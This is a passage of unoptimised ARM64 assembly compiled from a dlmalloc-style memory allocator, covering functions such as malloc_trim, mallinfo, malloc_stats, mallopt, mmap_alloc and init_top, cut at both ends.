LBB21_13: ; in Loop: Header=BB21_1 Depth=1
b LBB21_14
LBB21_14: ; in Loop: Header=BB21_1 Depth=1
ldur x8, [x29, #-40]
add x8, x8, #8
stur x8, [x29, #-40]
b LBB21_1
LBB21_15:
ldur x8, [x29, #-8]
ldr x8, [x8, #16]
ldur x9, [x29, #-8]
ldr x9, [x9, #48]
subs x8, x8, x9
cset w8, ls
tbnz w8, #0, LBB21_17
b LBB21_16
LBB21_16:
ldur x0, [x29, #-8]
mov x1, #0
bl _sys_trim
b LBB21_17
LBB21_17:
ldur x0, [x29, #-32]
ldp x29, x30, [sp, #112] ; 16-byte Folded Reload
add sp, sp, #128
ret
.cfi_endproc
; -- End function
.globl _malloc_trim ; -- Begin function malloc_trim
.p2align 2
_malloc_trim: ; @malloc_trim
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #8]
str wzr, [sp, #4]
adrp x8, _mparams@PAGE
ldr x8, [x8, _mparams@PAGEOFF]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB22_2
b LBB22_1
LBB22_1:
bl _init_mparams
b LBB22_2
LBB22_2:
ldr x1, [sp, #8]
adrp x0, __gm_@PAGE
add x0, x0, __gm_@PAGEOFF
bl _sys_trim
str w0, [sp, #4]
ldr w0, [sp, #4]
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _malloc_footprint ; -- Begin function malloc_footprint
.p2align 2
_malloc_footprint: ; @malloc_footprint
.cfi_startproc
; %bb.0:
adrp x8, __gm_@PAGE
add x8, x8, __gm_@PAGEOFF
ldr x0, [x8, #856]
ret
.cfi_endproc
; -- End function
.globl _malloc_max_footprint ; -- Begin function malloc_max_footprint
.p2align 2
_malloc_max_footprint: ; @malloc_max_footprint
.cfi_startproc
; %bb.0:
adrp x8, __gm_@PAGE
add x8, x8, __gm_@PAGEOFF
ldr x0, [x8, #864]
ret
.cfi_endproc
; -- End function
.globl _malloc_footprint_limit ; -- Begin function malloc_footprint_limit
.p2align 2
_malloc_footprint_limit: ; @malloc_footprint_limit
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
adrp x8, __gm_@PAGE
add x8, x8, __gm_@PAGEOFF
ldr x8, [x8, #872]
str x8, [sp, #8]
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB25_2
b LBB25_1
LBB25_1:
mov x8, #-1
str x8, [sp] ; 8-byte Folded Spill
b LBB25_3
LBB25_2:
ldr x8, [sp, #8]
str x8, [sp] ; 8-byte Folded Spill
b LBB25_3
LBB25_3:
ldr x0, [sp] ; 8-byte Folded Reload
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _malloc_set_footprint_limit ; -- Begin function malloc_set_footprint_limit
.p2align 2
_malloc_set_footprint_limit: ; @malloc_set_footprint_limit
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
adrp x8, _mparams@PAGE
add x8, x8, _mparams@PAGEOFF
str x8, [sp] ; 8-byte Folded Spill
adrp x8, __gm_@PAGE
add x8, x8, __gm_@PAGEOFF
str x8, [sp, #8] ; 8-byte Folded Spill
str x0, [sp, #24]
ldr x8, [sp, #24]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB26_2
b LBB26_1
LBB26_1:
ldr x9, [sp] ; 8-byte Folded Reload
ldr x8, [x9, #16]
subs x8, x8, #1
add x8, x8, #1
ldr x9, [x9, #16]
subs x9, x9, #1
bic x8, x8, x9
str x8, [sp, #16]
b LBB26_2
LBB26_2:
ldr x8, [sp, #24]
adds x8, x8, #1
cset w8, ne
tbnz w8, #0, LBB26_4
b LBB26_3
LBB26_3:
str xzr, [sp, #16]
b LBB26_5
LBB26_4:
ldr x9, [sp] ; 8-byte Folded Reload
ldr x8, [sp, #24]
ldr x10, [x9, #16]
subs x10, x10, #1
add x8, x8, x10
ldr x9, [x9, #16]
subs x9, x9, #1
bic x8, x8, x9
str x8, [sp, #16]
b LBB26_5
LBB26_5:
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldr x0, [sp, #16]
str x0, [x8, #872]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _mallinfo ; -- Begin function mallinfo
.p2align 2
_mallinfo: ; @mallinfo
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x0, __gm_@PAGE
add x0, x0, __gm_@PAGEOFF
bl _internal_mallinfo
ldp x29, x30, [sp], #16 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function internal_mallinfo
_internal_mallinfo: ; @internal_mallinfo
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x8, [sp, #32] ; 8-byte Folded Spill
mov x8, x0
ldr x0, [sp, #32] ; 8-byte Folded Reload
stur x8, [x29, #-8]
mov w1, #0
mov x2, #80
bl _memset
adrp x8, _mparams@PAGE
ldr x8, [x8, _mparams@PAGEOFF]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB28_2
b LBB28_1
LBB28_1:
bl _init_mparams
b LBB28_2
LBB28_2:
ldur x8, [x29, #-8]
ldr x8, [x8, #40]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB28_19
b LBB28_3
LBB28_3:
mov x8, #1
stur x8, [x29, #-16]
ldur x8, [x29, #-8]
ldr x8, [x8, #16]
add x8, x8, #80
stur x8, [x29, #-24]
ldur x8, [x29, #-24]
stur x8, [x29, #-32]
ldur x8, [x29, #-8]
add x8, x8, #888
stur x8, [x29, #-40]
b LBB28_4
LBB28_4: ; =>This Loop Header: Depth=1
; Child Loop BB28_9 Depth 2
ldur x8, [x29, #-40]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB28_18
b LBB28_5
LBB28_5: ; in Loop: Header=BB28_4 Depth=1
ldur x8, [x29, #-40]
ldr x8, [x8]
str x8, [sp, #24] ; 8-byte Folded Spill
ldur x8, [x29, #-40]
ldr x8, [x8]
add x8, x8, #16
ands x8, x8, #0xf
cset w8, ne
tbnz w8, #0, LBB28_7
b LBB28_6
LBB28_6: ; in Loop: Header=BB28_4 Depth=1
mov x8, #0
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB28_8
LBB28_7: ; in Loop: Header=BB28_4 Depth=1
ldur x8, [x29, #-40]
ldr x8, [x8]
add x8, x8, #16
and x9, x8, #0xf
mov x8, #16
subs x8, x8, x9
and x8, x8, #0xf
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB28_8
LBB28_8: ; in Loop: Header=BB28_4 Depth=1
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldr x9, [sp, #16] ; 8-byte Folded Reload
add x8, x8, x9
str x8, [sp, #48]
b LBB28_9
LBB28_9: ; Parent Loop BB28_4 Depth=1
; => This Inner Loop Header: Depth=2
ldr x8, [sp, #48]
ldur x9, [x29, #-40]
ldr x9, [x9]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB28_13
b LBB28_10
LBB28_10: ; in Loop: Header=BB28_9 Depth=2
ldr x8, [sp, #48]
ldur x9, [x29, #-40]
ldr x9, [x9]
ldur x10, [x29, #-40]
ldr x10, [x10, #8]
add x9, x9, x10
subs x8, x8, x9
cset w8, hs
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB28_13
b LBB28_11
LBB28_11: ; in Loop: Header=BB28_9 Depth=2
ldr x8, [sp, #48]
ldur x9, [x29, #-8]
ldr x9, [x9, #40]
subs x8, x8, x9
cset w8, eq
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB28_13
b LBB28_12
LBB28_12: ; in Loop: Header=BB28_9 Depth=2
ldr x8, [sp, #48]
ldr x8, [x8, #8]
subs x8, x8, #11
cset w8, ne
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB28_13
LBB28_13: ; in Loop: Header=BB28_9 Depth=2
ldr w8, [sp, #12] ; 4-byte Folded Reload
tbz w8, #0, LBB28_17
b LBB28_14
LBB28_14: ; in Loop: Header=BB28_9 Depth=2
ldr x8, [sp, #48]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
str x8, [sp, #40]
ldr x9, [sp, #40]
ldur x8, [x29, #-32]
add x8, x8, x9
stur x8, [x29, #-32]
ldr x8, [sp, #48]
ldr x8, [x8, #8]
and x8, x8, #0x3
subs x8, x8, #1
cset w8, ne
tbnz w8, #0, LBB28_16
b LBB28_15
LBB28_15: ; in Loop: Header=BB28_9 Depth=2
ldr x9, [sp, #40]
ldur x8, [x29, #-24]
add x8, x8, x9
stur x8, [x29, #-24]
ldur x8, [x29, #-16]
add x8, x8, #1
stur x8, [x29, #-16]
b LBB28_16
LBB28_16: ; in Loop: Header=BB28_9 Depth=2
ldr x8, [sp, #48]
ldr x9, [sp, #48]
ldr x9, [x9, #8]
and x9, x9, #0xfffffffffffffff8
add x8, x8, x9
str x8, [sp, #48]
b LBB28_9
LBB28_17: ; in Loop: Header=BB28_4 Depth=1
ldur x8, [x29, #-40]
ldr x8, [x8, #16]
stur x8, [x29, #-40]
b LBB28_4
LBB28_18:
ldr x9, [sp, #32] ; 8-byte Folded Reload
ldur x8, [x29, #-32]
str x8, [x9]
ldur x8, [x29, #-16]
str x8, [x9, #8]
ldur x8, [x29, #-8]
ldr x8, [x8, #856]
ldur x10, [x29, #-32]
subs x8, x8, x10
str x8, [x9, #32]
ldur x8, [x29, #-8]
ldr x8, [x8, #864]
str x8, [x9, #40]
ldur x8, [x29, #-8]
ldr x8, [x8, #856]
ldur x10, [x29, #-24]
subs x8, x8, x10
str x8, [x9, #56]
ldur x8, [x29, #-24]
str x8, [x9, #64]
ldur x8, [x29, #-8]
ldr x8, [x8, #16]
str x8, [x9, #72]
b LBB28_19
LBB28_19:
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.globl _malloc_stats ; -- Begin function malloc_stats
.p2align 2
_malloc_stats: ; @malloc_stats
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x0, __gm_@PAGE
add x0, x0, __gm_@PAGEOFF
bl _internal_malloc_stats
ldp x29, x30, [sp], #16 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function internal_malloc_stats
_internal_malloc_stats: ; @internal_malloc_stats
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
str x8, [sp, #40] ; 8-byte Folded Spill
stur x0, [x29, #-8]
adrp x8, _mparams@PAGE
ldr x8, [x8, _mparams@PAGEOFF]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB30_2
b LBB30_1
LBB30_1:
bl _init_mparams
b LBB30_2
LBB30_2:
stur xzr, [x29, #-16]
stur xzr, [x29, #-24]
stur xzr, [x29, #-32]
ldur x8, [x29, #-8]
ldr x8, [x8, #40]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB30_19
b LBB30_3
LBB30_3:
ldur x8, [x29, #-8]
add x8, x8, #888
stur x8, [x29, #-40]
ldur x8, [x29, #-8]
ldr x8, [x8, #864]
stur x8, [x29, #-16]
ldur x8, [x29, #-8]
ldr x8, [x8, #856]
stur x8, [x29, #-24]
ldur x8, [x29, #-24]
ldur x9, [x29, #-8]
ldr x9, [x9, #16]
add x9, x9, #80
subs x8, x8, x9
stur x8, [x29, #-32]
b LBB30_4
LBB30_4: ; =>This Loop Header: Depth=1
; Child Loop BB30_9 Depth 2
ldur x8, [x29, #-40]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB30_18
b LBB30_5
LBB30_5: ; in Loop: Header=BB30_4 Depth=1
ldur x8, [x29, #-40]
ldr x8, [x8]
str x8, [sp, #32] ; 8-byte Folded Spill
ldur x8, [x29, #-40]
ldr x8, [x8]
add x8, x8, #16
ands x8, x8, #0xf
cset w8, ne
tbnz w8, #0, LBB30_7
b LBB30_6
LBB30_6: ; in Loop: Header=BB30_4 Depth=1
mov x8, #0
str x8, [sp, #24] ; 8-byte Folded Spill
b LBB30_8
LBB30_7: ; in Loop: Header=BB30_4 Depth=1
ldur x8, [x29, #-40]
ldr x8, [x8]
add x8, x8, #16
and x9, x8, #0xf
mov x8, #16
subs x8, x8, x9
and x8, x8, #0xf
str x8, [sp, #24] ; 8-byte Folded Spill
b LBB30_8
LBB30_8: ; in Loop: Header=BB30_4 Depth=1
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldr x9, [sp, #24] ; 8-byte Folded Reload
add x8, x8, x9
str x8, [sp, #48]
b LBB30_9
LBB30_9: ; Parent Loop BB30_4 Depth=1
; => This Inner Loop Header: Depth=2
ldr x8, [sp, #48]
ldur x9, [x29, #-40]
ldr x9, [x9]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB30_13
b LBB30_10
LBB30_10: ; in Loop: Header=BB30_9 Depth=2
ldr x8, [sp, #48]
ldur x9, [x29, #-40]
ldr x9, [x9]
ldur x10, [x29, #-40]
ldr x10, [x10, #8]
add x9, x9, x10
subs x8, x8, x9
cset w8, hs
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB30_13
b LBB30_11
LBB30_11: ; in Loop: Header=BB30_9 Depth=2
ldr x8, [sp, #48]
ldur x9, [x29, #-8]
ldr x9, [x9, #40]
subs x8, x8, x9
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB30_13
b LBB30_12
LBB30_12: ; in Loop: Header=BB30_9 Depth=2
ldr x8, [sp, #48]
ldr x8, [x8, #8]
subs x8, x8, #11
cset w8, ne
str w8, [sp, #20] ; 4-byte Folded Spill
b LBB30_13
LBB30_13: ; in Loop: Header=BB30_9 Depth=2
ldr w8, [sp, #20] ; 4-byte Folded Reload
tbz w8, #0, LBB30_17
b LBB30_14
LBB30_14: ; in Loop: Header=BB30_9 Depth=2
ldr x8, [sp, #48]
ldr x8, [x8, #8]
and x8, x8, #0x3
subs x8, x8, #1
cset w8, ne
tbnz w8, #0, LBB30_16
b LBB30_15
LBB30_15: ; in Loop: Header=BB30_9 Depth=2
ldr x8, [sp, #48]
ldr x8, [x8, #8]
and x9, x8, #0xfffffffffffffff8
ldur x8, [x29, #-32]
subs x8, x8, x9
stur x8, [x29, #-32]
b LBB30_16
LBB30_16: ; in Loop: Header=BB30_9 Depth=2
ldr x8, [sp, #48]
ldr x9, [sp, #48]
ldr x9, [x9, #8]
and x9, x9, #0xfffffffffffffff8
add x8, x8, x9
str x8, [sp, #48]
b LBB30_9
LBB30_17: ; in Loop: Header=BB30_4 Depth=1
ldur x8, [x29, #-40]
ldr x8, [x8, #16]
stur x8, [x29, #-40]
b LBB30_4
LBB30_18:
b LBB30_19
LBB30_19:
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr x0, [x8]
ldur x8, [x29, #-16]
mov x9, sp
str x8, [x9]
adrp x1, l_.str@PAGE
add x1, x1, l_.str@PAGEOFF
bl _fprintf
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr x0, [x8]
ldur x8, [x29, #-24]
mov x9, sp
str x8, [x9]
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
bl _fprintf
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr x0, [x8]
ldur x8, [x29, #-32]
mov x9, sp
str x8, [x9]
adrp x1, l_.str.2@PAGE
add x1, x1, l_.str.2@PAGEOFF
bl _fprintf
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.globl _mallopt ; -- Begin function mallopt
.p2align 2
_mallopt: ; @mallopt
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
str w1, [sp, #8]
ldur w0, [x29, #-4]
ldr w1, [sp, #8]
bl _change_mparam
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function change_mparam
_change_mparam: ; @change_mparam
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, _mparams@PAGE
adrp x9, _mparams@PAGE
add x9, x9, _mparams@PAGEOFF
str x9, [sp, #16] ; 8-byte Folded Spill
stur w0, [x29, #-8]
stur w1, [x29, #-12]
ldr x8, [x8, _mparams@PAGEOFF]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB32_2
b LBB32_1
LBB32_1:
bl _init_mparams
b LBB32_2
LBB32_2:
ldur w8, [x29, #-12]
adds w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB32_4
b LBB32_3
LBB32_3:
mov x8, #-1
str x8, [sp, #8] ; 8-byte Folded Spill
b LBB32_5
LBB32_4:
ldursw x8, [x29, #-12]
str x8, [sp, #8] ; 8-byte Folded Spill
b LBB32_5
LBB32_5:
ldr x8, [sp, #8] ; 8-byte Folded Reload
str x8, [sp, #24]
ldur w8, [x29, #-8]
str w8, [sp, #4] ; 4-byte Folded Spill
adds w8, w8, #3
cset w8, eq
tbnz w8, #0, LBB32_13
b LBB32_6
LBB32_6:
ldr w8, [sp, #4] ; 4-byte Folded Reload
adds w8, w8, #2
cset w8, eq
tbnz w8, #0, LBB32_9
b LBB32_7
LBB32_7:
ldr w8, [sp, #4] ; 4-byte Folded Reload
adds w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB32_14
b LBB32_8
LBB32_8:
ldr x9, [sp, #16] ; 8-byte Folded Reload
ldr x8, [sp, #24]
str x8, [x9, #32]
mov w8, #1
stur w8, [x29, #-4]
b LBB32_15
LBB32_9:
ldr x9, [sp, #16] ; 8-byte Folded Reload
ldr x8, [sp, #24]
ldr x9, [x9, #8]
subs x8, x8, x9
cset w8, lo
tbnz w8, #0, LBB32_12
b LBB32_10
LBB32_10:
ldr x8, [sp, #24]
ldr x9, [sp, #24]
subs x9, x9, #1
ands x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB32_12
b LBB32_11
LBB32_11:
ldr x9, [sp, #16] ; 8-byte Folded Reload
ldr x8, [sp, #24]
str x8, [x9, #16]
mov w8, #1
stur w8, [x29, #-4]
b LBB32_15
LBB32_12:
stur wzr, [x29, #-4]
b LBB32_15
LBB32_13:
ldr x9, [sp, #16] ; 8-byte Folded Reload
ldr x8, [sp, #24]
str x8, [x9, #24]
mov w8, #1
stur w8, [x29, #-4]
b LBB32_15
LBB32_14:
stur wzr, [x29, #-4]
b LBB32_15
LBB32_15:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _malloc_usable_size ; -- Begin function malloc_usable_size
.p2align 2
_malloc_usable_size: ; @malloc_usable_size
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #16]
ldr x8, [sp, #16]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB33_4
b LBB33_1
LBB33_1:
ldr x8, [sp, #16]
subs x8, x8, #16
str x8, [sp, #8]
ldr x8, [sp, #8]
ldr x8, [x8, #8]
and x8, x8, #0x3
subs x8, x8, #1
cset w8, eq
tbnz w8, #0, LBB33_3
b LBB33_2
LBB33_2:
ldr x8, [sp, #8]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
ldr x9, [sp, #8]
ldr x9, [x9, #8]
ands x9, x9, #0x3
cset w9, eq
and w11, w9, #0x1
mov x10, #8
mov x9, #16
ands w11, w11, #0x1
csel x9, x9, x10, ne
subs x8, x8, x9
str x8, [sp, #24]
b LBB33_5
LBB33_3:
b LBB33_4
LBB33_4:
str xzr, [sp, #24]
b LBB33_5
LBB33_5:
ldr x0, [sp, #24]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function mmap_alloc
_mmap_alloc: ; @mmap_alloc
.cfi_startproc
; %bb.0:
sub sp, sp, #96
.cfi_def_cfa_offset 96
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x9, _mparams@PAGE
add x9, x9, _mparams@PAGEOFF
stur x0, [x29, #-16]
stur x1, [x29, #-24]
ldur x8, [x29, #-24]
add x8, x8, #48
add x8, x8, #15
ldr x10, [x9, #8]
subs x10, x10, #1
add x8, x8, x10
ldr x9, [x9, #8]
subs x9, x9, #1
bic x8, x8, x9
stur x8, [x29, #-32]
ldur x8, [x29, #-16]
ldr x8, [x8, #872]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB34_5
b LBB34_1
LBB34_1:
ldur x8, [x29, #-16]
ldr x8, [x8, #856]
ldur x9, [x29, #-32]
add x8, x8, x9
str x8, [sp, #40]
ldr x8, [sp, #40]
ldur x9, [x29, #-16]
ldr x9, [x9, #856]
subs x8, x8, x9
cset w8, ls
tbnz w8, #0, LBB34_3
b LBB34_2
LBB34_2:
ldr x8, [sp, #40]
ldur x9, [x29, #-16]
ldr x9, [x9, #872]
subs x8, x8, x9
cset w8, ls
tbnz w8, #0, LBB34_4
b LBB34_3
LBB34_3:
; kill: def $x8 killed $xzr
stur xzr, [x29, #-8]
b LBB34_18
LBB34_4:
b LBB34_5
LBB34_5:
ldur x8, [x29, #-32]
ldur x9, [x29, #-24]
subs x8, x8, x9
cset w8, ls
tbnz w8, #0, LBB34_17
b LBB34_6
LBB34_6:
ldur x1, [x29, #-32]
mov x0, #0
mov w2, #3
mov w3, #4098
mov w4, #-1
mov x5, #0
bl _mmap
str x0, [sp, #32]
ldr x8, [sp, #32]
adds x8, x8, #1
cset w8, eq
tbnz w8, #0, LBB34_16
b LBB34_7
LBB34_7:
ldr x8, [sp, #32]
add x8, x8, #16
ands x8, x8, #0xf
cset w8, ne
tbnz w8, #0, LBB34_9
b LBB34_8
LBB34_8:
mov x8, #0
str x8, [sp] ; 8-byte Folded Spill
b LBB34_10
LBB34_9:
ldr x8, [sp, #32]
add x8, x8, #16
and x9, x8, #0xf
mov x8, #16
subs x8, x8, x9
and x8, x8, #0xf
str x8, [sp] ; 8-byte Folded Spill
b LBB34_10
LBB34_10:
ldr x8, [sp] ; 8-byte Folded Reload
str x8, [sp, #24]
ldur x8, [x29, #-32]
ldr x9, [sp, #24]
subs x8, x8, x9
subs x8, x8, #32
str x8, [sp, #16]
ldr x8, [sp, #32]
ldr x9, [sp, #24]
add x8, x8, x9
str x8, [sp, #8]
ldr x8, [sp, #24]
ldr x9, [sp, #8]
str x8, [x9]
ldr x8, [sp, #16]
ldr x9, [sp, #8]
str x8, [x9, #8]
ldr x8, [sp, #8]
ldr x9, [sp, #16]
add x9, x8, x9
mov x8, #11
str x8, [x9, #8]
ldr x8, [sp, #8]
ldr x9, [sp, #16]
add x9, x9, #8
add x8, x8, x9
str xzr, [x8, #8]
ldur x8, [x29, #-16]
ldr x8, [x8, #24]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB34_12
b LBB34_11
LBB34_11:
ldr x8, [sp, #32]
ldur x9, [x29, #-16]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB34_13
b LBB34_12
LBB34_12:
ldr x8, [sp, #32]
ldur x9, [x29, #-16]
str x8, [x9, #24]
b LBB34_13
LBB34_13:
ldur x10, [x29, #-32]
ldur x9, [x29, #-16]
ldr x8, [x9, #856]
add x8, x8, x10
str x8, [x9, #856]
ldur x9, [x29, #-16]
ldr x9, [x9, #864]
subs x8, x8, x9
cset w8, ls
tbnz w8, #0, LBB34_15
b LBB34_14
LBB34_14:
ldur x8, [x29, #-16]
ldr x8, [x8, #856]
ldur x9, [x29, #-16]
str x8, [x9, #864]
b LBB34_15
LBB34_15:
ldr x8, [sp, #8]
add x8, x8, #16
stur x8, [x29, #-8]
b LBB34_18
LBB34_16:
b LBB34_17
LBB34_17:
; kill: def $x8 killed $xzr
stur xzr, [x29, #-8]
b LBB34_18
LBB34_18:
ldur x0, [x29, #-8]
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
add sp, sp, #96
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function segment_holding
_segment_holding: ; @segment_holding
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #16]
str x1, [sp, #8]
ldr x8, [sp, #16]
add x8, x8, #888
str x8, [sp]
b LBB35_1
LBB35_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #8]
ldr x9, [sp]
ldr x9, [x9]
subs x8, x8, x9
cset w8, lo
tbnz w8, #0, LBB35_4
b LBB35_2
LBB35_2: ; in Loop: Header=BB35_1 Depth=1
ldr x8, [sp, #8]
ldr x9, [sp]
ldr x9, [x9]
ldr x10, [sp]
ldr x10, [x10, #8]
add x9, x9, x10
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB35_4
b LBB35_3
LBB35_3:
ldr x8, [sp]
str x8, [sp, #24]
b LBB35_7
LBB35_4: ; in Loop: Header=BB35_1 Depth=1
ldr x8, [sp]
ldr x8, [x8, #16]
mov x9, x8
str x9, [sp]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB35_6
b LBB35_5
LBB35_5:
; kill: def $x8 killed $xzr
str xzr, [sp, #24]
b LBB35_7
LBB35_6: ; in Loop: Header=BB35_1 Depth=1
b LBB35_1
LBB35_7:
ldr x0, [sp, #24]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function init_bins
_init_bins: ; @init_bins
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
str wzr, [sp, #20]
b LBB36_1
LBB36_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #20]
subs w8, w8, #32
cset w8, hs
tbnz w8, #0, LBB36_4
b LBB36_2
LBB36_2: ; in Loop: Header=BB36_1 Depth=1
ldr x8, [sp, #24]
add x8, x8, #72
ldr w9, [sp, #20]
lsl w9, w9, #1
add x8, x8, w9, uxtw #3
str x8, [sp, #8]
ldr x8, [sp, #8]
ldr x9, [sp, #8]
str x8, [x9, #24]
ldr x9, [sp, #8]
str x8, [x9, #16]
b LBB36_3
LBB36_3: ; in Loop: Header=BB36_1 Depth=1
ldr w8, [sp, #20]
add w8, w8, #1
str w8, [sp, #20]
b LBB36_1
LBB36_4:
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function init_top
_init_top: ; @init_top
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
adrp x8, _mparams@PAGE
add x8, x8, _mparams@PAGEOFF
str x8, [sp, #8] ; 8-byte Folded Spill
str x0, [sp, #40]
str x1, [sp, #32]
str x2, [sp, #24]
ldr x8, [sp, #32]
add x8, x8, #16
ands x8, x8, #0xf
cset w8, ne
tbnz w8, #0, LBB37_2
b LBB37_1
LBB37_1:
mov x8, #0
str x8, [sp] ; 8-byte Folded Spill
b LBB37_3
LBB37_2:
ldr x8, [sp, #32]
add x8, x8, #16
and x9, x8, #0xf
mov x8, #16
subs x8, x8, x9
and x8, x8, #0xf
str x8, [sp] ; 8-byte Folded Spill
b LBB37_3
LBB37_3:
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldr x9, [sp] ; 8-byte Folded Reload
str x9, [sp, #16]
ldr x9, [sp, #32]
ldr x10, [sp, #16]
add x9, x9, x10
str x9, [sp, #32]
ldr x10, [sp, #16]
ldr x9, [sp, #24]
subs x9, x9, x10
str x9, [sp, #24]
ldr x9, [sp, #32]
ldr x10, [sp, #40]
str x9, [x10, #40]
ldr x9, [sp, #24]
ldr x10, [sp, #40]
str x9, [x10, #16]
ldr x9, [sp, #24]
orr x9, x9, #0x1
ldr x10, [sp, #32]
str x9, [x10, #8]
ldr x9, [sp, #32]
ldr x10, [sp, #24]
add x10, x9, x10
mov x9, #80
str x9, [x10, #8]
ldr x8, [x8, #32]
ldr x9, [sp, #40]
str x8, [x9, #48]
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function prepend_alloc
